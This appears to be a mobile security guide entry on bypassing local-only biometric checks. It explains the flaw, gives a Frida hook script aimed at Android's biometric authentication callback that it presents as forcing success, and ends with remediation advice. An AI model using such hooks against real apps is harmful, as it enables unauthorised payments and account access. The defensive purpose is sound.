Biometric Bypass

Description

If critical operations rely only on local biometric success (fingerprint/Face ID) without server verification or device attestation, attackers can hook the biometric API and force success to unlock features or authorize payments.

Examples

Force Biometric Success With Frida (Android)

frida -U -f com.example.app -l - --no-pause <<'JS'
Java.perform(function () {
  var CB = Java.use('androidx.biometric.BiometricPrompt$AuthenticationCallback');
  CB.onAuthenticationSucceeded.implementation = function () {
    console.log('Forcing biometric success');
    return this.onAuthenticationSucceeded.apply(this, arguments);
  };
});
JS

If the server accepts privileged actions based solely on client-reported state, the bypass is effective.

Remediation

  1. Server‑side authorization
    • Treat local biometric as a UX convenience; verify authorization server‑side with signed challenges.
  2. Proof‑of‑possession
    • Bind operations to hardware‑backed keys and require per‑action signatures.
  3. Attestation and risk checks
    • Enforce device integrity (Play Integrity/App Attest) and step‑up auth on suspicious signals.